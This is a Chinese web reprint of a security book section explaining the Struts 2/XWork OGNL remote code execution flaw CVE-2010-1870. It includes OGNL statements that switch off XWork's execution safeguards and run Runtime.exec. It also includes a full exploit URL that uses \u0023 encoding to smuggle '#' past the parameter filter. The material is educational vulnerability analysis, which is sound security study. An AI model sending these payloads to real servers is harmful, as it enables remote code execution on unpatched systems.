频道栏目
读书频道 > 安全 > 白帽子讲Web安全
12.7.1 Struts 2命令执行漏洞
2012-08-17 22:16:15     我来说两句
收藏   我要投稿

本文所属图书 > 白帽子讲Web安全

在互联网时代,数据安全与个人隐私受到了前所未有的挑战,各种新奇的攻击技术层出不穷。如何才能更好地保护我们的数据?本书将带你走进Web安全的世界,让你了解Web安全的方方面面。黑客不再变得神秘,攻击技术原...  立即去当当网订购
2010年7月9日,安全研究者公布了Struts 2一个远程执行代码的漏洞(CVE-2010-1870),严格来说,这其实是XWork的漏洞,因为Struts 2的核心使用的是WebWork,而WebWork又是使用XWork来处理action的。
 
这个漏洞的细节描述公布在exploit-db 上。
 
在这里简单摘述如下:
 
XWork通过getters/setters方法从HTTP的参数中获取对应action的名称,这个过程是基于OGNL(Object Graph Navigation Language)的。OGNL是怎么处理的呢?如下:
 
user.address.city=Bishkek&user['favoriteDrink']=kumys
会被转化成:
action.getUser().getAddress().setCity("Bishkek") 
action.getUser().setFavoriteDrink("kumys") 
这个过程是由ParametersInterceptor调用ValueStack.setValue()完成的,它的参数是用户可控的,由HTTP参数传入。OGNL的功能较为强大,远程执行代码也正是利用了它的功能。
* Method calling: foo() 
* Static method calling: @java.lang.System@exit(1) 
* Constructor calling: new MyClass() 
* Ability to work with context variables: #foo = new MyClass() 
* And more... 
由于参数完全是用户可控的,所以XWork出于安全的目的,增加了两个方法用以阻止代码执行。
* OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (缺省为true) 
* SecurityMemberAccess private field called 'allowStaticMethodAccess' (缺省为false) 
但这两个方法可以被覆盖,从而导致代码执行。
#_memberAccess['allowStaticMethodAccess'] = true 
#foo = new java .lang.Boolean("false") 
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo 
#rt = @java.lang.Runtime@getRuntime() 
#rt.exec('mkdir /tmp/PWNED') 
ParametersInterceptor是不允许参数名称中有#的,因为OGNL中的许多预定义变量也是以#表示的。
* #context - OgnlContext, the one guarding method execution based on 'xwork.MethodAccessor. denyMethodExecution' property value. 
* #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution. 
* #root 
* #this 
* #_typeResolver 
* #_classResolver 
* #_traceEvaluations 
* #_lastEvaluation 
* #_keepLastEvaluation 
可是攻击者在过去找到了这样的方法(bug编号XW-641):使用\u0023来代替#,这是#的十六进制编码,从而构造出可以远程执行的攻击payload。
http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.den 
yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRunti 
me()))=1 
最终导致代码执行成功。
您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力  
上一篇:12.7 Web框架自身安全
下一篇:12.7.2 Struts 2的问题补丁
相关文章
图文推荐
排行
热门
最新书评
特别推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站